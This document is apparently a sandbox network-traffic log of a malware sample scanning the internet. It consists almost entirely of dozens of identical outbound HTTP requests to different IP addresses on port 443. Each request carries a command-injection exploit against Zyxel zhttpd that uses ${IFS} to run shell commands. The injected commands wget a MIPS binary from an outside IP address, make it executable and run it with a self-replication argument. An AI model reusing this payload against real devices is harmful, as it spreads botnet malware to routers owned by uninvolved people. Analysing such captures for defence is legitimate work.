                                          Jan 14, 2024 15:46:13.941277981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3701192.168.2.2358592147.62.3.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941299915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3702192.168.2.233589878.199.113.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941325903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3703192.168.2.2358198124.94.81.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941382885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3704192.168.2.2354808141.190.157.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941395998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3705192.168.2.2334288170.182.136.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941431046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3706192.168.2.2343568131.3.252.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941464901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3707192.168.2.234300617.226.107.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941489935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3708192.168.2.234353668.209.18.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941540003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3709192.168.2.2352856180.128.202.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941596031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3710192.168.2.2359954180.51.37.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941658020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3711192.168.2.2336606158.51.140.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941730976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3712192.168.2.2360820175.15.11.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941730976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3713192.168.2.2358346200.247.152.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941765070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3714192.168.2.2343056105.73.240.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941803932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3715192.168.2.233775260.213.27.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941858053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3716192.168.2.2342294136.224.19.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941924095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3717192.168.2.2358114174.148.7.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941924095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3718192.168.2.2335796159.112.124.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.941956997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3719192.168.2.2340136129.69.130.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942027092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3720192.168.2.234834470.217.170.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942071915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3721192.168.2.234736895.217.149.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942101002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3722192.168.2.233358061.77.222.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942125082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3723192.168.2.235618258.52.40.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942193031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3724192.168.2.2335354177.155.74.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942222118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3725192.168.2.235330468.189.52.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942270994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3726192.168.2.2352672167.87.190.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942307949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3727192.168.2.235327661.63.63.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942352057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3728192.168.2.2333976139.168.64.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942390919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3729192.168.2.2352472204.8.174.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942411900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3730192.168.2.2351450195.113.179.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942471027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3731192.168.2.2347004196.128.223.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942536116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3732192.168.2.233318268.151.164.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942570925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3733192.168.2.234226435.31.48.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942610979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3734192.168.2.235546220.158.234.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942677975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3735192.168.2.235049845.173.84.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942703962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3736192.168.2.2337444167.100.62.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942734957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3737192.168.2.235239277.42.238.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942792892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3738192.168.2.2339612108.123.245.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942814112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3739192.168.2.2359306170.104.194.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942852974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3740192.168.2.23592689.110.132.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942903996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3741192.168.2.2336494162.103.178.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942917109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3742192.168.2.2339638209.79.7.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942946911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3743192.168.2.235083646.208.243.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.942965984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3744192.168.2.2341918191.41.4.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943023920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3745192.168.2.2353006118.36.117.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943054914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3746192.168.2.2350244192.215.11.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943089962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3747192.168.2.235795468.103.28.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943155050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3748192.168.2.2360356218.163.171.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943185091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3749192.168.2.2353734159.196.10.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943205118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3750192.168.2.234510668.10.139.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943269014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3751192.168.2.2335210115.26.117.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943311930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3752192.168.2.2347430128.226.235.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943334103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3753192.168.2.2343074139.115.235.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943403959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3754192.168.2.2358496175.31.28.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943414927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3755192.168.2.2356896176.13.69.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943465948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3756192.168.2.2337626142.141.75.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943502903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3757192.168.2.2353374183.94.109.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943535089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3758192.168.2.2343006217.138.185.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943593979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3759192.168.2.235767096.29.131.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943618059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3760192.168.2.234625449.20.46.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943682909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3761192.168.2.2360702116.147.23.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943713903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3762192.168.2.2348280130.37.79.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:13.943753958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3763192.168.2.2334714138.244.96.49443
                                          TimestampBytes transferredDirectionData
